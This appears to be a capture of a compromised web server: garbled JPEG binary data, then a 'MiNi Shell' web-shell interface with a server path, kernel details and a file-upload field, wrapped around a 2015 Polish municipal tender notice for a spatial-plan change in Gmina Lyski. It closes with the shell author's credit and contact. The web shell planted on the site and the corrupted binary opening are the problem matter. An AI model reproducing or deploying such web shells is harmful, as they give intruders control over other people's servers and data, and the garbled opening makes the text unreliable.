JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150424/94590-N-2015.html

<p class="kh_header"><b>Lyski: Zmiana miejscowego planu zagospodarowania przestrzennego Gminy Lyski dla sołectw
Pstrążna i Raszczyce</b><br>
<b>Numer ogłoszenia: 94590 - 2015; data zamieszczenia: 24.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lyski , ul. Dworcowa 1a, 44-295 Lyski, woj. śląskie, tel. 32 4300051 wew. 119.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lyski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zmiana miejscowego planu zagospodarowania przestrzennego Gminy Lyski dla sołectw
Pstrążna i Raszczyce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia jest:
1. Zmiana miejscowego planu zagospodarowania przestrzennego gminy Lyski dla sołectw
Pstrążna i Raszczyce zgodnie z uchwałami:
1) Nr RG.0007.70.2014 Rady Gminy Lyski z dnia 30 października 2014 r. w sprawie
przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego
Gminy Lyski dla sołectwa Pstrążna;
2) Nr RG.0007.69.2014 Rady Gminy Lyski z dnia 30 października 2014 r. w sprawie
przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego
Gminy Lyski dla sołectwa Raszczyce.
Łączny zakres opracowania obejmuje obszar gminy Lyski w granicach administracyjnych sołectw
Pstrążna i Raszczyce tj. 942,70 ha.
2. W toku realizacji zamówienia Wykonawca jest zobowiązany do:
1) sporządzenia projektu zmiany miejscowego planu zagospodarowania przestrzennego zgodnie
z ustawą z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (t.j. Dz.U.
z 2015 r. poz. 199), rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r.
w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania
przestrzennego zagospodarowania przestrzennego (Dz. U. Nr 164, poz. 1587) oraz ustawy
z dnia 4 marca 2010 r. o infrastrukturze informacji przestrzennej (Dz.U. Nr 76, poz.489
z późn.zm.);
2) opracowania Prognozy oddziaływania na środowisko - zgodnie z ustawą z dnia 3 października
2008r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa
w ochronie środowiska oraz o ocenach oddziaływania na środowisko (tj. Dz. U. z 2013 r. poz.
1235);
3) opracowania Prognozy skutków finansowych uchwalenia zmiany planu uwzględniającej
wymagania rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie
wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz.U.
Nr 164, poz.1587);
4) wykonania w imieniu Zamawiającego wszelkich czynności niezbędnych do prawidłowego
i kompletnego przeprowadzenia procedury zmiany planu, kompletowanie dokumentacji
formalno - prawnej prac planistycznych zgodnie z art. 17 ustawy o planowaniu
i zagospodarowaniu przestrzennym oraz rozporządzeniem Ministra Infrastruktury z dnia 26
sierpnia 2003r. w sprawie wymaganego zakresu projektu miejscowego planu
zagospodarowania przestrzennego zagospodarowania przestrzennego (Dz. U. Nr 164, poz.
1587);
5) sporządzenia zmiany planu w wersji papierowej i elektronicznej na kopii mapy, o której mowa
w art.16 ustawy o planowaniu i zagospodarowaniu przestrzennym;
6) pozyskania niezbędnych map na potrzeby przedmiotowego zamówienia oraz jeśli zajdzie taka
konieczność dokonania ich kalibracji na własny koszt;
Rysunek opracowany na bazie mapy zasadniczej winien zawierać granice i numery działek.
Projekt musi zawierać łączną powierzchnię opracowania oraz powierzchnie poszczególnych
terenów (jednostek planu), a także zestawienie działek objętych renta planistyczną wraz
z podaniem powierzchni tych działek (wskazaniem całości lub części powierzchni);
7) analizy wniosków o zmiany w planie, które wpłynęły przed ogłoszeniem i obwieszczeniem
o przystąpieniu do sporządzenia planu;
8) uczestnictwa w dyskusjach publicznych, prezentacji projektu planu Komisji Urbanistyczno-
Architektonicznej;
9) do udziału w posiedzeniach Komisji, sesjach Rady Gminy, spotkaniach z Wójtem i innych
spotkaniach, których konieczność wyniknie w trakcie procedury planistycznej.
3. W celu realizacji przedmiotu umowy Zamawiający przekaże Wykonawcy, z którym zostanie zawarta
umowa niezbędne materiały znajdujące się w jego posiadaniu.
Dla terenu objętego przedmiotem zamówienia gmina posiada aktualne plany zagospodarowania
przestrzennego:
1) sołectwa Pstrążna zatwierdzony Uchwałą Rady Gminy Lyski Nr L/9/2006 z dnia 09.02.2006 r.
(Dz.U. Woj.Śl. Nr 41, poz. 1183 z dnia 4 kwietnia 2006 r.);
2) sołectwa Raszczyce zatwierdzony Uchwałą Rady Gminy Lyski Nr LVIII/55/2006 z dnia
25.10.2006 r. (Dz.U. Woj.Śl. Nr 141, poz. 3966 z dnia 4 grudnia 2006 r.);
Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Lyski zatwierdzone
uchwałą Rady Gminy Lyski Nr RG.0007.75.2011 z dnia 13.09.2011 r. oraz Opracowanie
ekofizjograficzne dla gminy Lyski (grudzień 2010 r.).
4. Pozostałe dane i materiały (w tym kopię mapy zasadniczej, o której mowa w § 16 ustawy z dnia 23
marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (t.j. Dz.U. z 2015r. Poz.199))
Wykonawca pozyska we własnym zakresie, a ich koszt zawiera się w cenie oferty.
II. Wymagania techniczne
1. Opracowania muszą być przekazywane w formie papierowej i cyfrowej, opracowania te muszą być
tożsame.
2. Wymagania dla rysunków planu:
1) Dane rastrowe: rysunek w postaci TIFF z georeferencją rastra.
2) Raster planu powinien posiadać przypisaną georeferencje w układzie PL-2000.
3) Dane wektorowe: dane w postaci SHP. Standard SHAPE to cztery pliki składające się na jedną
warstwę tematyczną (shp, dba, prj, shx).
4) Dostarczyć należy warstwy tematyczne:
a) Granica planu - warstwa poligonowa zawierająca granice opracowania MPZP;
b) Przeznaczenie terenów - warstwa typu poligon - wyodrębnione przeznaczenia terenów
planu, jeden obiekt poligonowy to jeden teren planistyczny, jednostka planistyczna
posiadająca opis atrybutowy zawierający minimum trzy atrybuty opisujące;
c) Przeznaczenie - skrótowy opis przeznaczenia tj. MN, U, MU, MW, ZP;
d) Symbol - opis terenu planistycznego, jednostki planistycznej, unikalny identyfikator
terenu mający odzwierciedlenie w tekście planu, 1.MN, 5.U, (symbol musi być identyczny
jak oznaczenie na rysunku planu oraz w treści uchwały);
e) Opis przeznaczenia - opis skrótu przeznaczenia tj w legendzie i uchwale planu. Dla
przeznaczenia MN opis to zabudowa mieszkaniowa jednorodzinna);
f) Linie zabudowy - warstwa liniowa - warstwa zawiera linie zabudowy i opis atrybutowy
podziału linii na linie obowiązujące i nieprzekraczalne;
g) Typ - opis typu linii (obowiązująca lub nieprzekraczalna);
h) Inne warstwy tematyczne - pozostałe ustalenia planów (tj. linie wysokiego napięcia,
punkty widokowe - wszystkie elementy wymienione w legendzie);
i) Dopuszcza się trzy typy warstw: liniowe, poligonowe, punktowe;
j) Każda warstwa powinna zawierać opis atrybutowy w postaci:
k) Nazwa - nazwa taka jak w legendzie rysunku i w treści planu;
l) Etykieta - jeśli na rysunku planu warstwa posiada opis (np. numer stanowiska
archeologicznego, oznaczenie dla linii wysokiego napięci itp.);
3. Wymagania dla tekstu:
Tekst uchwały w formacie Edytor Aktów Prawnych XML Legislator oraz .pdf;
III. Na wykonane zadanie Zamawiający żąda udzielenia 60 miesięcy gwarancji..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium
w wysokości 3 000,00 zł (słownie: trzy tysiące złotych).
2. Wadium należy wnieść w formach przewidzianych w art. 45 ust. 6 pkt 1-5 ustawy Pzp.
3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4. Wadium w pieniądzu należy wnieść przelewem na konto Zamawiającego:
Rybnicki Bank Spółdzielczy Nr 84 8455 0000 2001 0031 8059 0004
5. W przypadku wadium wnoszonego w pieniądzu za termin wniesienia uznaje się chwilę uznania kwoty na rachunku Zamawiającego.
6. W przypadku wniesienia wadium w innej formie niż w pieniądzu kserokopię dokumentu wadialnego potwierdzoną za zgodność z oryginałem należy załączyć do oferty, natomiast oryginał dokumentu wadialnego należy również załączyć do oferty z tym, że w sposób umożliwiający jego przechowanie bez naruszania oferty.
7. Nie wniesienie wadium w terminie, spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy Pzp, a jego oferta zostanie odrzucona na podstawie art. 24 ust. 4 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert,
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługę polegającą na opracowaniu miejscowego planu zagospodarowania przestrzennego
o powierzchni min. 800 ha (za wykonany plan rozumie się uchwalony dokument) oraz załączył dowody, określające, że ta usługa została wykonana należycie; Ocena spełnienia powyższych warunków udziału w postępowaniu dokonywana będzie w oparciu
o dokumenty złożone przez wykonawcę  metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje co najmniej jedną osobą wyznaczoną do pełnienia funkcji głównego projektanta, która ma w dorobku co najmniej 1 uchwalony miejscowy plan zagospodarowania przestrzennego o powierzchni min. 800 ha oraz złożył oświadczenie o posiadaniu przez wskazaną osobę wymaganych uprawnień zgodnych z art. 5 ustawy z dnia 23 marca 2003 r.
o planowaniu i zagospodarowaniu przestrzennym (Dz.U. z 2015 poz. 199 tekst jednolity); Ocena spełnienia powyższych warunków udziału w postępowaniu dokonywana będzie w oparciu
o dokumenty złożone przez wykonawcę  metodą spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Forma zatrudnienia głównego projektanta - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania następującej zmiany w zawartej umowie. Warunki zmiany:
1) zmiana terminu wykonania przedmiotu zamówienia spowodowana zmianą obowiązujących przepisów i koniecznością dostosowania do nich przedmiotu zamówienia,
2) zmiana terminu wykonania przedmiotu zamówienia spowodowana koniecznością ponowienia procedury planistycznej w związku z uwagami złożonymi do projektu miejscowego planu zagospodarowania przestrzennego,
3) zmiana terminu wykonania przedmiotu zamówienia spowodowana niezależnym od Wykonawcy przedłużeniem się procedury wyłączenia gruntów z produkcji rolnej i leśnej,
4) zmiana terminu wykonania przedmiotu zamówienia spowodowana przedłużającą się procedurą  uzgadniania projektu planu przez Zamawiającego,
5) zmiany harmonogramu realizacji poszczególnych etapów zamówienia stanowiących podstawę wystawienia faktury,
6) w zakresie wynagrodzenia w przypadku ustawowej zmiany stawki podatku VAT wynagrodzenie ulega odpowiednio zmianie tak, aby dotychczasowe wynagrodzenie netto należne Wykonawcy nie uległo zmianie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lyski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Lyski, ul. Dworcowa 1a, 44-295 Lyski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2015 godzina 09:00, miejsce: Urząd Gminy Lyski, ul. Dworcowa 1a, 44-295 Lyski, biuro nr 19.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com